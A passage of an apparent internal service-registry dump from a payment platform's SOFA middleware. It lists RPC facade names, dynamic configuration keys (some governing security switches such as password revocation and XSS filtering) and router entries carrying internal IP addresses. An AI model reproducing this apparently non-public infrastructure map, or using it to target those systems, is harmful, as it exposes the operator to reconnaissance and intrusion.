.ldc.tair.customerv2_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.preTaskPageCtrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kgcore.common.service.client.tr.VertexTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hyp.common.service.facade.EventTaskContextFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.nozone.NoZoneRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.SecurityLabelsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databizcore.common.service.facade.address.AddressResolveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.complain.service.facade.ComplainEnumTranslateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mif_GRZONE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.planzero.rockcodecore.facade.token.TokenServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:PROJECT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.disposeTimePer,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:penaltyRecordDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualityprod.service.riskctrl.spi.ChangeCtrlCallbackService:1.0:jiuzhou@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.katongprod.common.service.facade.reconciliation.SynKatongReconciliationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.RiskProcessPolicyService:1.0:uctlite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanprod.common.service.facade.service.lend.LendAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesync.common.service.spi.api.MobileSyncUpstreamSpiService:1.0:publiccore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdsm.common.service.facade.OneAgentRecognitionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.161.239.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcprocessCommonCallbackHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.facade.ISwitchZoneRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.55.213.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.mng.feature.facade.FeatureHandleService:1.0:mybank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_publishProdCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.output.ResponseBuildFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepCharity95Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:messagefusion@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_SCHEDULER_SERVERLESS_SERVICE_COLLECTION_MATCH_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","mfinbaseprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","tallycore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dcepprod.common.service.facade.api.ExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_B_FUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.client.SystemAppInvokeService:1.0:tbsecurityexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchantsettle.service.common.facade.SettleProductManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@wealthbffweb#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.baoxiancore.common.service.InsFundAssetDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.IsvMessageMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.dfriskmng.facade.RaDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.console.GroupServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthfront.service.facade.query.PcreditAuthOptQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.notify.ExterfaceNotifyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.QueryBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.YebDailyLimitQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.csportal:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:publicDomain_securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.equipment.EquipmentWriteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.dislike.DislikeGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:anteduprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sdabombardier.common.service.facade.relationship.IotDeviceAppIdAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:barcodeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.todayNotWorkDayStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.aap.common.service.facade.dashboard.DashboardMetaInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.SearchConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.account.TrusteeshipAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:mwalletmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.http.OrchestrationHttpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_riskDevelopFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finallocation.common.service.facade.api.AllocationMngSchemaModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_VOUCHERPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.campaign.mng.SceneSchemaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbgrouppurchaseprod.common.service.facade.activity.GroupActivityWhiteListConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.common.core.service.facade.RouteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.177.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.acquirefront.service.facade.api.AcquireOAuthQueryByAuthInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.MobileAiFeatureCollectTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dataphin-scheduleproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sandbox.common.service.facade.shadow.ShadowUserRegistService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchorder.biz.shared.consumeprod.RecordInnerRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.recommend.OperationStrategyRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_OVERSEAEXPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.piece.facade.PieceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.facade.alarmanalysis.CrashInvestigationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicServiceExecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.cashback.service.facade.CashBackOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tiyubiz.facade.team.BackstageTeamRankFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cryptprod.common.service.facade.CipherKeyQueryFacade:1.0:fccryptprod_boss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_RISK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.66.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.prodSuspendActivatedTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gmcore.common.service.facade.api.MerchantSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.core.model.control.SubBudgetMergeeRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.208.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.common.service.facade.api.DataCollectionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.maxPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mmtcaftscmdproc.common.service.facade.DeviceProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.144.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.38.44.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secuinfos.common.service.facade.api.datasync.FundAnnoucementSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.TaskExceptionInfoService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:opsWorkOrderApplyProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.asset.service.AssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.162.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEscape,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:meshyserver_standardProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerc.common.service.facade.app.AppInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpaas.zappinfo.facade.update.ApplicationUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.RealTimeMonitorMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_ENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.176.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchorder.common.service.facade.order.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.united.FinsUnitedContractQueryCurZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.MobileAckCodeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tradetemplate.TradeTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.notify.ExterfaceNotifyFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auth_center.common.service.facade.res.ManagedRoleService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.campaign.DstCampParticipantInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:itemProcessAuditHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.175.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fininfo.common.service.facade.info.InfoEventTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finconsumeprod:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:opswarecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.QuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimcenter.common.service.InsUserReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.custdecision.service.questionnaire.QuestionnaireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.dataphin.gather.common.facade.register.service.RtOpenService:1.0:dpgather@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebguardian.common.facade.service.GrayConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.zdatacontext.common.agent.drm.UniformAssertClientDRM.moneyThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mashup:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.zcache.tbase.zdatabusTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dmeta.facade.virtualcanvas.DmetaVirtualCanvasVersionReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fin.pdcore.common.service.facade.adapter.AdapterProdCalendarServiceFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_factoringAssetFluxApproveCheckCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.role.RoleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openctrl.facade.opencore.ModelsManageForAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iexratecenter.service.facade.api.ExOriginRateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.common.event.UniformEventMessageListener:1.0:campPrize@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoadprod.common.service.AdvertisementPublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.depcore.service.facade.DtCacheAccountingConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.195.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchmobile.common.service.facade.widget.mng.PageUIFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlogmng.common.service.facade.spm.SpmInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpayprod.common.service.facade.services.JbCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:moaprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.store.service.facade.NewsOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.isv.ParamConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.delayLevelWhenNextConsume,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.128.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:miniselfop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csshield.service.facade.api.ModifyFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmepconnector.facade.service.msc.DossierServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_DEDUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.106.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditcustsrv.facade.pcmarking.api.PcreditCouponFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.DynamicConfigTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ifcfeecharge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.zmodel.core.evaluator.config.ZModelCoreEvaluatorResource.threadConfigurations,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2_dest.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.recommend.LifeReportCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.backupAdsProdIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accenter.service.query.api.AccenterTitleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iconnect.common.facade.api.DeliveryCampaignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.AdminJointManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.pointcert.MemberPointCertService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.action.ActionService:1.0:mobileChatGroupStatusServiceBean@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.mobile.scancodelogin.DeveloperRoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.232.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.cloud.apfasmng.common.service.facade.serverlessplan.ServerlessPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openitemcore.common.service.facade.api.trade.TradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.52.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoprod.core.model.camp.relate.repository.CampRelateDetailRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchbenefit.common.service.facade.BenefitOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.function.FunctionRuleScriptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:mdeduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditMarketUserRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.tlou.TlouStandardBizUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.drmdemos:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_STREAM_SERVERLESS_DATAFLOW_FULL_APP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recmixer.common.service.facade.CategoryCandidateService:1.0:apshopcenter-default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveServiceForLdc:1.0:finresprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.inner.policy.close@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.katongprod.signcenter.service.read.AllStatusSignDataQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkoyzbroker.spi.publish.DataFetchFacade:1.0:BROKER_SPI_DATA_FETCH@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.null:name=com.antcloud.ifcidentitycloudus.biz.nac.drm.NacConfigDrmServiceImpl.multiLanguageSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.192.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_O_USER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mobileic@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.207.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.common.service.finaccenter.facade.api.FinacParaDynamicConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.cloudlego.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipayment.service.facade.api.InstantPaymentServiceXTS6:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:TestView@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.SystemNoticeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.distinguish.drm.ArResMngDrm.debugAct,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.payacceptance.PaccRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mordercenter.common.service.facade.api.query.KbOrderMessageTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-bmwcoresrv@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.migrationActionMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_INSXHCPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.248.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finvirtualta.core.service.yeb.repository.MinitransAccountModifyLogRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.space.spi.CreativityService:1.0:finasmcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.rest.venus.RestVenusService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFaca